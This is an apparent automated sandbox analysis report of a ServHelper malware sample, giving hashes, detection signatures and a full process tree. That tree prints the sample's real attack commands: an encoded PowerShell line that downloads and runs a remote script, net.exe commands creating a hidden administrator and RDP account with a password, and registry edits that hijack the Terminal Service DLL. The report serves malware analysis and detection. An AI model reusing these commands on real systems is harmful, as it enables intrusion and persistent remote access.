Analysis
- max time kernel: 48s
- max time network: 135s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 11-08-2021 07:36

Static task: static1
Behavioral task: behavioral1
- Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Resource: win10v20210410
General
- Target: bfe0ac25eeeb759f7c8e06229c7313a2.exe
- Size: 5.9MB
- MD5: bfe0ac25eeeb759f7c8e06229c7313a2
- SHA1: 199c1fbd29f9ec98b83464763dac63ef80998bb3
- SHA256: be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
- SHA512: a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
suricata: ET MALWARE ServHelper CnC Inital Checkin

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Processes (flow / pid / process):
- 17 / 2824 / powershell.exe
- 19 / 2824 / powershell.exe
- 20 / 2824 / powershell.exe
- 21 / 2824 / powershell.exe
- 23 / 2824 / powershell.exe
- 25 / 2824 / powershell.exe
- 27 / 2824 / powershell.exe
- 29 / 2824 / powershell.exe
- 31 / 2824 / powershell.exe

Modifies RDP port number used by Windows (1 TTP)

Sets DLL path for service in the registry (2 TTPs)

Resources (resource / yara_rule):
- \Windows\Branding\mediasrv.png / upx
- \Windows\Branding\mediasvc.png / upx

Loads dropped DLL (2 IoCs)
Processes (pid / process):
- 2876 / 2876

Drops file in Program Files directory (4 IoCs)
Processes (description / ioc / process):
- File opened for modification / C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT / powershell.exe
- File opened for modification / C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI / powershell.exe
- File opened for modification / C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT / powershell.exe
- File opened for modification / C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI / powershell.exe

Drops file in Windows directory (19 IoCs)
Processes (description / ioc / process):
- File opened for modification / C:\Windows\branding\ShellBrd / powershell.exe
- File opened for modification / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F2D.tmp / powershell.exe
- File opened for modification / C:\Windows\branding\Basebrd / powershell.exe
- File opened for modification / C:\Windows\branding\wupsvc.jpg / powershell.exe
- File created / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4hlykntf.ztb.ps1 / powershell.exe
- File opened for modification / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F4D.tmp / powershell.exe
- File opened for modification / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F6F.tmp / powershell.exe
- File created / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive / powershell.exe
- File created / C:\Windows\branding\wupsvc.jpg / powershell.exe
- File opened for modification / C:\Windows\branding\mediasvc.png / powershell.exe
- File created / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vfb1nfhh.oxx.psm1 / powershell.exe
- File created / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP / powershell.exe
- File opened for modification / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F5E.tmp / powershell.exe
- File created / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log / powershell.exe
- File created / C:\Windows\branding\mediasrv.png / powershell.exe
- File created / C:\Windows\branding\mediasvc.png / powershell.exe
- File opened for modification / C:\Windows\branding\mediasrv.png / powershell.exe
- File opened for modification / C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5F6E.tmp / powershell.exe
- File opened for modification / C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat / powershell.exe

Modifies data under HKEY_USERS (64 IoCs)

Modifies registry key (1 TTP, 1 IoC)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description / flow / ioc):
- HTTP User-Agent header / 19 / Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header / 20 / Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header / 21 / Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header / 23 / Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes (pid / process):
- 2732 / powershell.exe
- 2732 / powershell.exe
- 2732 / powershell.exe
- 428 / powershell.exe
- 428 / powershell.exe
- 428 / powershell.exe
- 1988 / powershell.exe
- 1988 / powershell.exe
- 1988 / powershell.exe
- 2912 / powershell.exe
- 2912 / powershell.exe
- 2912 / powershell.exe
- 2732 / powershell.exe
- 2732 / powershell.exe
- 2732 / powershell.exe
- 2824 / powershell.exe
- 2824 / powershell.exe
- 2824 / powershell.exe

Suspicious behavior: LoadsDriver (2 IoCs)
Processes (pid / process):
- 620 / 620

Suspicious use of AdjustPrivilegeToken (64 IoCs)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1808

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2732

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4dpkxhkc\4dpkxhkc.cmdline"
      - Suspicious use of WriteProcessMemory
      PID: 736

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2938.tmp" "c:\Users\Admin\AppData\Local\Temp\4dpkxhkc\CSC566D3070E6FA445095B09EA7D51A1EB8.TMP"
        PID: 3328

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 428

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1988

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2912

    C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 3388

    C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
      PID: 736

    C:\Windows\system32\reg.exe (depth 3)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 208

    C:\Windows\system32\net.exe (depth 3)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      PID: 3356

      C:\Windows\system32\net1.exe (depth 4)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 1968

    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      PID: 2132

      C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        PID: 736

        C:\Windows\system32\net.exe (depth 5)
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          PID: 3388

          C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start rdpdr
            PID: 2032

    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      PID: 2488

      C:\Windows\system32\cmd.exe (depth 4)
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        PID: 2912

        C:\Windows\system32\net.exe (depth 5)
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          PID: 492

          C:\Windows\system32\net1.exe (depth 6)
            Command line: C:\Windows\system32\net1 start TermService
            PID: 684

    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 4472

    C:\Windows\system32\cmd.exe (depth 3)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 4488

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  PID: 3948

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    PID: 1132

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
      PID: 3772

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc pz7fz8AV /add
  - Suspicious use of WriteProcessMemory
  PID: 2784

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc pz7fz8AV /add
    - Suspicious use of WriteProcessMemory
    PID: 1968

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc pz7fz8AV /add
      PID: 1684

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 3116

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    PID: 3948

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID: 1292

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  - Suspicious use of WriteProcessMemory
  PID: 1280

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    - Suspicious use of WriteProcessMemory
    PID: 2132

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
      PID: 2824

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  PID: 3864

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    PID: 2116

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID: 3880

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd /C net.exe user WgaUtilAcc pz7fz8AV
  - Suspicious use of WriteProcessMemory
  PID: 1132

  C:\Windows\system32\net.exe (depth 2)
    Command line: net.exe user WgaUtilAcc pz7fz8AV
    - Suspicious use of WriteProcessMemory
    PID: 748

    C:\Windows\system32\net1.exe (depth 3)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc pz7fz8AV
      PID: 3936

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  PID: 1292

  C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic path win32_VideoController get name
    PID: 3956

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C wmic CPU get NAME
  PID: 3848

  C:\Windows\System32\Wbem\WMIC.exe (depth 2)
    Command line: wmic CPU get NAME
    PID: 3116

C:\Windows\System32\cmd.exe (depth 1)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 2920

  C:\Windows\system32\cmd.exe (depth 2)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 1132

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID: 2824

Network
MITRE ATT&CK Enterprise v6
Downloads